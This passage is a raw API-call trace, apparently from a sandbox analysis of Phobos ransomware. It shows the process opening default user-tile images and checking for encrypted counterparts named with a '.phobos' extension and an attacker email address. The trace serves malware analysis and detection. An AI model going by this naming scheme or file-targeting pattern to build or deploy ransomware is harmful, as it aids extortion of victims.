Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile22.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.224] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.224] CloseHandle (hObject=0x160) returned 1 [0200.224] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile22.bmp")) returned 0x20 [0200.224] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile22.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile22.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.225] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile23.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.225] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.225] CloseHandle (hObject=0x160) returned 1 [0200.225] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile23.bmp")) returned 0x20 [0200.225] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile23.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile23.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.226] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile24.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.226] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.226] CloseHandle (hObject=0x160) returned 1 [0200.226] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile24.bmp")) returned 0x20 [0200.226] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile24.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile24.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.227] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile25.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.227] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.227] CloseHandle (hObject=0x160) returned 1 [0200.227] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile25.bmp")) returned 0x20 [0200.227] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile25.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile25.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.228] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile26.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.228] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.228] CloseHandle (hObject=0x160) returned 1 [0200.228] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile26.bmp")) returned 0x20 [0200.228] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile26.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile26.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.229] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile27.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.229] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.229] CloseHandle (hObject=0x160) returned 1 [0200.229] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile27.bmp")) returned 0x20 [0200.229] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile27.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile27.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.229] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile28.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.230] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.230] CloseHandle (hObject=0x160) returned 1 [0200.230] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile28.bmp")) returned 0x20 [0200.230] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile28.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile28.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.230] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile29.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.231] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.231] CloseHandle (hObject=0x160) returned 1 [0200.231] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile29.bmp")) returned 0x20 [0200.231] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile29.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile29.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.231] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile30.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.232] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.232] CloseHandle (hObject=0x160) returned 1 [0200.232] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile30.bmp")) returned 0x20 [0200.233] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile30.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile30.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.233] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile31.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.233] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.233] CloseHandle (hObject=0x160) returned 1 [0200.233] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile31.bmp")) returned 0x20 [0200.234] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile31.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile31.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.234] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile32.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.235] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.235] CloseHandle (hObject=0x160) returned 1 [0200.235] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile32.bmp")) returned 0x20 [0200.235] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile32.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile32.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.235] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile33.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.238] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.238] CloseHandle (hObject=0x160) returned 1 [0200.238] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile33.bmp")) returned 0x20 [0200.239] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile33.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile33.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.239] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile34.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.239] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.239] CloseHandle (hObject=0x160) returned 1 [0200.239] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile34.bmp")) returned 0x20 [0200.240] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile34.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile34.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.240] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile35.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.240] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.240] CloseHandle (hObject=0x160) returned 1 [0200.240] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile35.bmp")) returned 0x20 [0200.240] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile35.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile35.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.241] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile36.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.241] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.241] CloseHandle (hObject=0x160) returned 1 [0200.241] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile36.bmp")) returned 0x20 [0200.241] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile36.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile36.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.242] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile37.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.242] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.242] CloseHandle (hObject=0x160) returned 1 [0200.242] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile37.bmp")) returned 0x20 [0200.242] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile37.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile37.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.242] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile38.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.243] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.243] CloseHandle (hObject=0x160) returned 1 [0200.243] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: 